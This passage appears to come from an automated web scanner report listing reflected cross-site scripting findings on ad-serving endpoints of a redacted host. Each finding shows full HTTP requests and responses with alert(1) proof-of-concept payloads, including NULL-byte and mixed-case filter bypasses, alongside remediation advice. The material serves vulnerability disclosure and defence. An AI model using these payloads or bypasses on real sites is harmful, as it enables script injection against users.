Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /APM/iview/273561243/direct;wi.300;hi.250/01?time=0.434555560536665&click=http://global.ard.yahoo.com/SIG=15nntbav7/M=782480.14428767.14283337.1442997/D=news/S=81121452:LREC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*&%00579d7"-alert(1)-"1f04857c051=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.yahoo.com/news/common/pages/generic/darla/md?en=utf-8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 2716
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:50 GMT

<SCRIPT Language="Javascript">
var DCcode = "rmm.msnbc/carvingboard_300x250_c";
var DCwidth = "300";
var DCheight = "250";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var ifr
...[SNIP]...
=782480.14428767.14283337.1442997/D=news/S=81121452:LREC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*&%00579d7"-alert(1)-"1f04857c051=1http://clk.redcated/goiframe/191362211.191524283/273561243/direct/01%3fhref=";
var scriptsrc = "http://ad.DoubleClick.net/adj/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + rand
...[SNIP]...

2.651. http://redcated/APM/iview/273561243/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/273561243/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0060cd4"><script>alert(1)</script>9a14f942a7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60cd4"><script>alert(1)</script>9a14f942a7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /APM/iview/273561243/direct;wi.300;hi.250/01?time=0.434555560536665&click=http://global.ard.yahoo.com/SIG=15nntbav7/M=782480.14428767.14283337.1442997/D=news/S=81121452:LREC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*&%0060cd4"><script>alert(1)</script>9a14f942a7d=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.yahoo.com/news/common/pages/generic/darla/md?en=utf-8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 535
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 16:56:42 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/188997161.166507678/273561243/direct;wi.300;hi.250/01" onclick="(new Image).src='http://global.ard.yahoo.com/SIG=15nntbav7/M=782480.14428767.14283337.1442997/D=news/S=81121452:LREC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*&%0060cd4"><script>alert(1)</script>9a14f942a7d=1http://t.redcated'">
...[SNIP]...

2.652. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /APM/iview/yhxxxdrv0010001133apm/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83cd7'%3b9aa541b8b75 was submitted in the REST URL parameter 4. This input was echoed as 83cd7';9aa541b8b75 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /APM/iview/yhxxxdrv0010001133apm/direct83cd7'%3b9aa541b8b75;wi.180;hi.150/01?time=0.14199027403169878&click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/* HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.yahoo.com/news/common/pages/generic/darla/md?en=utf-8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8566
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 16:56:55 GMT

<html>
<head>
<title>BA_MMN_180x150_US_TreeHugger_Discover_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/AAAVEMYFIANC/BA_2010/BA_MMN_180x150_US_TreeHugger_Discover.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/yhxxxdrv0010001133apm/direct83cd7';9aa541b8b75;wi.180;hi.150;ai.63110302.141072329.187135761;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/yhxxxdrv0010001133apm/direct83cd7';9aa541b8b75;wi.180;hi.150;ai.63110302.141072329.187135761;ct.1/01"
...[SNIP]...

2.653. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/yhxxxdrv0010001133apm/direct

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51131'-alert(1)-'e4befcecb2 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /APM/iview/yhxxxdrv0010001133apm/direct;wi.180;hi.150/01?time=0.14199027403169878&click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*51131'-alert(1)-'e4befcecb2 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.yahoo.com/news/common/pages/generic/darla/md?en=utf-8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8540
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:35 GMT

<html>
<head>
<title>BA_MMN_180x150_US_TreeHugger_Discover_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style
...[SNIP]...
0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*51131'-alert(1)-'e4befcecb2');
}
else
{
_strContentANC8620144854732 = '<a target="_blank" href="http://clk.atdmt.com/go/yhxxxdrv0010001133apm/direct;wi.180;hi.150;ai.63110302.141072329.187135761;ct.1/01/" onclick="if(\'ht
...[SNIP]...

2.654. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/yhxxxdrv0010001133apm/direct

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0050f31</script><script>alert(1)</script>176c5c1dbfc was submitted in the click parameter. This input was echoed as 50f31</script><script>alert(1)</script>176c5c1dbfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /APM/iview/yhxxxdrv0010001133apm/direct;wi.180;hi.150/01?time=0.14199027403169878&click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*%0050f31</script><script>alert(1)</script>176c5c1dbfc HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.yahoo.com/news/common/pages/generic/darla/md?en=utf-8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8698
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:34 GMT

<html>
<head>
<title>BA_MMN_180x150_US_WDYTYA_StartLooking_Glen_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body
...[SNIP]...
/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*%0050f31</script><script>alert(1)</script>176c5c1dbfc",
clickThruUrl: "http://clk.redcated/go/yhxxxdrv0010001133apm/direct;wi.180;hi.150;ai.63110302.141072329.187135768;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
...[SNIP]...

2.655. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/yhxxxdrv0010001133apm/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %009b10c'-alert(1)-'1df179b0461 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9b10c'-alert(1)-'1df179b0461 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /APM/iview/yhxxxdrv0010001133apm/direct;wi.180;hi.150/01?time=0.14199027403169878&click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*&%009b10c'-alert(1)-'1df179b0461=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.yahoo.com/news/common/pages/generic/darla/md?en=utf-8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8565
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 16:56:49 GMT

<html>
<head>
<title>BA_MMN_180x150_US_TreeHugger_Record_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="
...[SNIP]...
M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*&%009b10c'-alert(1)-'1df179b0461=1');
}
else
{
_strContentANC2920634583353 = '<a target="_blank" href="http://clk.atdmt.com/go/yhxxxdrv0010001133apm/direct;wi.180;hi.150;ai.63110302.141072329.187135765;ct.1/01/" onclick="if(\'
...[SNIP]...

2.656. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/yhxxxdrv0010001133apm/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56ab6"><ScRiPt>alert(1)</ScRiPt>235897e6649 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /APM/iview/yhxxxdrv0010001133apm/direct;wi.180;hi.150/01?time=0.14199027403169878&click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*&56ab6"><ScRiPt>alert(1)</ScRiPt>235897e6649=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.yahoo.com/news/common/pages/generic/darla/md?en=utf-8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8661
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 16:56:47 GMT

<html>
<head>
<title>BA_MMN_180x150_US_WDYTYA_StartLooking_Glen_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body
...[SNIP]...
eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*&56ab6"><ScRiPt>alert(1)</ScRiPt>235897e6649=1\')(new Image).src=\'http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0
...[SNIP]...

2.657. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/yhxxxdrv0010001133apm/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 736cf"-alert(1)-"cef8075eb2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /APM/iview/yhxxxdrv0010001133apm/direct;wi.180;hi.150/01?time=0.14199027403169878&click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*&736cf"-alert(1)-"cef8075eb2b=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.yahoo.com/news/common/pages/generic/darla/md?en=utf-8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 2745
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 16:56:47 GMT

<SCRIPT Language="Javascript">
var DCcode = "N6080.149339.8804879051621/B4137193.79";
var DCwidth = "180";
var DCheight = "150";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
v
...[SNIP]...
eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*&736cf"-alert(1)-"cef8075eb2b=1http://clk.redcated/goiframe/188992223.176758052/yhxxxdrv0010001133apm/direct/01?href=";
var scriptsrc = "http://ad.doubleclick.net/adj/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";or
...[SNIP]...

2.658. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/yhxxxdrv0010001133apm/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00899e3"><script>alert(1)</script>e1709a695d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 899e3"><script>alert(1)</script>e1709a695d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /APM/iview/yhxxxdrv0010001133apm/direct;wi.180;hi.150/01?time=0.14199027403169878&click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*&%00899e3"><script>alert(1)</script>e1709a695d5=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.yahoo.com/news/common/pages/generic/darla/md?en=utf-8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8676
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:48 GMT

<html>
<head>
<title>BA_MMN_180x150_US_WDYTYA_StartLooking_Glen_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body
...[SNIP]...
M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*&%00899e3"><script>alert(1)</script>e1709a695d5=1\')(new Image).src=\'http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0
...[SNIP]...

2.659. http://redcated/APM/iview/yhxxxdrv0010001133apm/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/yhxxxdrv0010001133apm/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 189c3</script><script>alert(1)</script>ab573606fb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /APM/iview/yhxxxdrv0010001133apm/direct;wi.180;hi.150/01?time=0.14199027403169878&click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*&189c3</script><script>alert(1)</script>ab573606fb8=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.yahoo.com/news/common/pages/generic/darla/md?en=utf-8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8670
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:51 GMT

<html>
<head>
<title>BA_MMN_180x150_US_TreeHugger_Discover_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style
...[SNIP]...
eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*&189c3</script><script>alert(1)</script>ab573606fb8=1",
clickThruUrl: "http://clk.redcated/go/yhxxxdrv0010001133apm/direct;wi.180;hi.150;ai.63110302.141072329.187135761;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =

...[SNIP]...

2.660. http://redcated/AVE/iview/266925773/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /AVE/iview/266925773/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7fa1'%3bf5f2bbdc305 was submitted in the REST URL parameter 4. This input was echoed as c7fa1';f5f2bbdc305 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

